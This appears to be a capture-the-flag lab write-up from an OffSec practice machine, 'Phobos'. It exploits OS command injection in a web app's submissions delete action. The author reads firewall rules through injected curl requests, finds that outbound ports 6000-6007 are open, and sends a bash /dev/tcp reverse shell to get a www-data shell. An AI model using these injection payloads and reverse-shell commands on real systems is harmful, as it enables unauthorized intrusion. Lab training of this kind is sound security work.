OS Command Injection

The OS command injection vulnerability is present at the file parameter of the delete action in the /submissions/ endpoint of the target web application and has been confirmed at a later stage. However, due to the presence of a [Phobos_Subversion#todo|possible firewall], network-related commands have not been successful. Given that command execution is still possible and output can be checked via writing to an accessible directory, I can have a temporary “shell”

┌──(kali㉿kali)-[~/…/phobos/svn/dev/users]
└─$ cmd='$(id > /var/www/html/internal/submissions/out.txt)'; time curl -s -X POST http://internal-phobos.phobos.offsec/submissions/ -H 'Content-Type: application/x-www-form-urlencoded' -b 'csrftoken=Mzge3HqUkskMhLrCgOg6Sm36tAYAJmJDIg00kNXey0c1RuuHoRfWUy0Gmo7lt8ML; sessionid=xq2mlknhlq6qaxbski9h52okwmq4c1dj' --data-binary "csrfmiddlewaretoken=PuG5TIGZ30vR3gnYCGKsS8gdatHhuq2pLbqRaOdjhyn6DZq3KJJiUkdN3hQ2ec5x&file=$cmd&action=delete" | grep -i real ; curl http://192.168.104.131/internal/submissions/out.txt                
 
real	0.08s
user	0.00s
sys	0.00s
cpu	10%
 
real	0.08s
user	0.00s
sys	0.00s
cpu	2%
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Like so

Firewall (ufw)

┌──(kali㉿kali)-[~/…/phobos/svn/dev/users]
└─$ cmd='$(cat /etc/default/ufw | grep -v '^#' > /var/www/html/internal/submissions/out.txt)'; time curl -s -X POST http://internal-phobos.phobos.offsec/submissions/ -H 'Content-Type: application/x-www-form-urlencoded' -b 'csrftoken=Mzge3HqUkskMhLrCgOg6Sm36tAYAJmJDIg00kNXey0c1RuuHoRfWUy0Gmo7lt8ML; sessionid=xq2mlknhlq6qaxbski9h52okwmq4c1dj' --data-binary "csrfmiddlewaretoken=PuG5TIGZ30vR3gnYCGKsS8gdatHhuq2pLbqRaOdjhyn6DZq3KJJiUkdN3hQ2ec5x&file=$cmd&action=delete" | grep -i real ; curl http://192.168.104.131/internal/submissions/out.txt
 
[...REDACTED...]
 
IPV6=yes
 
DEFAULT_INPUT_POLICY="DROP"
 
DEFAULT_OUTPUT_POLICY="DROP"
 
DEFAULT_FORWARD_POLICY="DROP"
 
DEFAULT_APPLICATION_POLICY="SKIP"
 
MANAGE_BUILTINS=no
 
IPT_SYSCTL=/etc/ufw/sysctl.conf
 
IPT_MODULES="nf_conntrack_ftp nf_nat_ftp nf_conntrack_netbios_ns"

The firewall(ufw) is configured to initiate with the /etc/ufw/sysctl.conf file

┌──(kali㉿kali)-[~/…/phobos/svn/dev/users]
└─$ cmd='$(ls -la /etc/ufw > /var/www/html/internal/submissions/out.txt)'; time curl -s -X POST http://internal-phobos.phobos.offsec/submissions/ -H 'Content-Type: application/x-www-form-urlencoded' -b 'csrftoken=Mzge3HqUkskMhLrCgOg6Sm36tAYAJmJDIg00kNXey0c1RuuHoRfWUy0Gmo7lt8ML; sessionid=xq2mlknhlq6qaxbski9h52okwmq4c1dj' --data-binary "csrfmiddlewaretoken=PuG5TIGZ30vR3gnYCGKsS8gdatHhuq2pLbqRaOdjhyn6DZq3KJJiUkdN3hQ2ec5x&file=$cmd&action=delete" | grep -i real ; curl http://192.168.104.131/internal/submissions/out.txt
 
[...REDACTED...]
 
total 56
drwxr-xr-x  3 root root 4096 Nov  5  2020 .
drwxr-xr-x 93 root root 4096 Feb  3  2021 ..
-rwxr-xr-x  1 root root 1126 Nov  5  2020 after.init
-rwxr-xr-x  1 root root 1004 Jan 26  2021 after.rules
-rwxr-xr-x  1 root root  915 Jan 26  2021 after6.rules
drwxr-xr-x  3 root root 4096 Jan 26  2021 applications.d
-rwxr-xr-x  1 root root 1130 Nov  5  2020 before.init
-rwxr-xr-x  1 root root 2537 Mar 25  2019 before.rules
-rwxr-xr-x  1 root root 6700 Mar 25  2019 before6.rules
-rwxr-xr-x  1 root root 1391 Aug 15  2017 sysctl.conf
-rwxr-xr-x  1 root root  313 Jan 26  2021 ufw.conf
-rwxr-xr-x  1 root root 1977 Jan 26  2021 user.rules
-rwxr-xr-x  1 root root 1611 Jan 26  2021 user6.rules

Checking the configuration directory of the firewall(ufw), /etc/ufw, list a bunch of configuration

`ufw.conf`

┌──(kali㉿kali)-[~/…/phobos/svn/dev/users]
└─$ cmd='$(cat /etc/ufw/ufw.conf | grep -v '^#' > /var/www/html/internal/submissions/out.txt)'; time curl -s -X POST http://internal-phobos.phobos.offsec/submissions/ -H 'Content-Type: application/x-www-form-urlencoded' -b 'csrftoken=Mzge3HqUkskMhLrCgOg6Sm36tAYAJmJDIg00kNXey0c1RuuHoRfWUy0Gmo7lt8ML; sessionid=xq2mlknhlq6qaxbski9h52okwmq4c1dj' --data-binary "csrfmiddlewaretoken=PuG5TIGZ30vR3gnYCGKsS8gdatHhuq2pLbqRaOdjhyn6DZq3KJJiUkdN3hQ2ec5x&file=$cmd&action=delete" | grep -i real ; curl http://192.168.104.131/internal/submissions/out.txt
 
[...REDACTED...]
 
ENABLED=yes
 
LOGLEVEL=low

It is indeed enabled

`user.rules`

┌──(kali㉿kali)-[~/…/phobos/svn/dev/users]
└─$ cmd='$(cat /etc/ufw/user.rules > /var/www/html/internal/submissions/out.txt)'; time curl -s -X POST http://internal-phobos.phobos.offsec/submissions/ -H 'Content-Type: application/x-www-form-urlencoded' -b 'csrftoken=Mzge3HqUkskMhLrCgOg6Sm36tAYAJmJDIg00kNXey0c1RuuHoRfWUy0Gmo7lt8ML; sessionid=xq2mlknhlq6qaxbski9h52okwmq4c1dj' --data-binary "csrfmiddlewaretoken=PuG5TIGZ30vR3gnYCGKsS8gdatHhuq2pLbqRaOdjhyn6DZq3KJJiUkdN3hQ2ec5x&file=$cmd&action=delete" | grep -i real ; curl http://192.168.104.131/internal/submissions/out.txt     
 
[...REDACTED...]
 
*filter
:ufw-user-input - [0:0]
:ufw-user-output - [0:0]
:ufw-user-forward - [0:0]
:ufw-before-logging-input - [0:0]
:ufw-before-logging-output - [0:0]
:ufw-before-logging-forward - [0:0]
:ufw-user-logging-input - [0:0]
:ufw-user-logging-output - [0:0]
:ufw-user-logging-forward - [0:0]
:ufw-after-logging-input - [0:0]
:ufw-after-logging-output - [0:0]
:ufw-after-logging-forward - [0:0]
:ufw-logging-deny - [0:0]
:ufw-logging-allow - [0:0]
:ufw-user-limit - [0:0]
:ufw-user-limit-accept - [0:0]
### RULES ###
 
### tuple ### allow tcp 80 0.0.0.0/0 any 0.0.0.0/0 in
-A ufw-user-input -p tcp --dport 80 -j ACCEPT
 
### tuple ### allow any 27017 127.0.0.1 any 0.0.0.0/0 out
-A ufw-user-output -p tcp -d 127.0.0.1 --dport 27017 -j ACCEPT
-A ufw-user-output -p udp -d 127.0.0.1 --dport 27017 -j ACCEPT
 
### tuple ### allow any 27017 172.17.0.2 any 0.0.0.0/0 out
-A ufw-user-output -p tcp -d 172.17.0.2 --dport 27017 -j ACCEPT
-A ufw-user-output -p udp -d 172.17.0.2 --dport 27017 -j ACCEPT
 
### tuple ### allow tcp 6000:6007 0.0.0.0/0 any 0.0.0.0/0 out
-A ufw-user-output -p tcp -m multiport --dports 6000:6007 -j ACCEPT
 
### END RULES ###
 
### LOGGING ###
-A ufw-after-logging-input -j LOG --log-prefix "[UFW BLOCK] " -m limit --limit 3/min --limit-burst 10
-A ufw-after-logging-output -j LOG --log-prefix "[UFW BLOCK] " -m limit --limit 3/min --limit-burst 10
-A ufw-after-logging-forward -j LOG --log-prefix "[UFW BLOCK] " -m limit --limit 3/min --limit-burst 10
-I ufw-logging-deny -m conntrack --ctstate INVALID -j RETURN -m limit --limit 3/min --limit-burst 10
-A ufw-logging-deny -j LOG --log-prefix "[UFW BLOCK] " -m limit --limit 3/min --limit-burst 10
-A ufw-logging-allow -j LOG --log-prefix "[UFW ALLOW] " -m limit --limit 3/min --limit-burst 10
### END LOGGING ###
 
### RATE LIMITING ###
-A ufw-user-limit -m limit --limit 3/minute -j LOG --log-prefix "[UFW LIMIT BLOCK] "
-A ufw-user-limit -j REJECT
-A ufw-user-limit-accept -j ACCEPT
### END RATE LIMITING ###
COMMIT

The user.rules file is the file that gets generated if firewall configuration is made by end users The below rules are present:

-A ufw-user-input -p tcp --dport 80 -j ACCEPT
- Accepting inbound TCP packet on port 80
-A ufw-user-output -p tcp -d 127.0.0.1 --dport 27017 -j ACCEPT
- Accepting outbound TCP packet for the 127.0.0.1:27017 socket
-A ufw-user-output -p tcp -d 172.17.0.2 --dport 27017 -j ACCEPT
- Accepting outbound TCP packet for the 172.17.0.2:27017 socket
  - Docker host?
-A ufw-user-output -p tcp -m multiport --dports 6000:6007 -j ACCEPT
- Accepting outbound TCP packets from port 6000 to 6007
  - This is the entrypoint

Exploitation

Given the target system accepts outbound TCP packet from port 6000 to 6007, I can use one of those ports to start a shell sessions. This also explains why the network-related commands have failed previously

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/phobos]
└─$ cmd='$(bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.45.218%2F6000%200%3E%261)'; curl -s -X POST http://internal-phobos.phobos.offsec/submissions/ -H 'Content-Type: application/x-www-form-urlencoded' -b 'csrftoken=Mzge3HqUkskMhLrCgOg6Sm36tAYAJmJDIg00kNXey0c1RuuHoRfWUy0Gmo7lt8ML; sessionid=xq2mlknhlq6qaxbski9h52okwmq4c1dj' --data-binary "csrfmiddlewaretoken=PuG5TIGZ30vR3gnYCGKsS8gdatHhuq2pLbqRaOdjhyn6DZq3KJJiUkdN3hQ2ec5x&file=$cmd&action=delete"

Sending the payload

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/phobos]
└─$ nnc 6000
listening on [any] 6000 ...
connect to [192.168.45.218] from (UNKNOWN) [192.168.104.131] 33736
bash: cannot set terminal process group (1194): Inappropriate ioctl for device
bash: no job control in this shell
www-data@ubuntu:/$ whoami
whoami
www-data
www-data@ubuntu:/$ hostname
hostname
ubuntu
www-data@ubuntu:/$ ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
3: docker0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default 
    link/ether 02:42:83:3a:8b:3f brd ff:ff:ff:ff:ff:ff
    inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
       valid_lft forever preferred_lft forever
    inet6 fe80::42:83ff:fe3a:8b3f/64 scope link 
       valid_lft forever preferred_lft forever
5: vethc812e22@if4: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master docker0 state UP group default 
    link/ether b2:18:64:f5:36:86 brd ff:ff:ff:ff:ff:ff link-netnsid 0
    inet6 fe80::b018:64ff:fef5:3686/64 scope link 
       valid_lft forever preferred_lft forever
6: ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 00:50:56:9e:3d:17 brd ff:ff:ff:ff:ff:ff
    inet 192.168.104.131/24 brd 192.168.104.255 scope global ens192
       valid_lft forever preferred_lft forever

Initial Foothold established to the target system as the www-data account via OS command injection

InfoSec LAB

Explorer

Phobos_Exploitation

OS Command Injection

Firewall (ufw)

`ufw.conf`

`user.rules`

Exploitation

Interactive Graph View

Table of Contents

Backlinks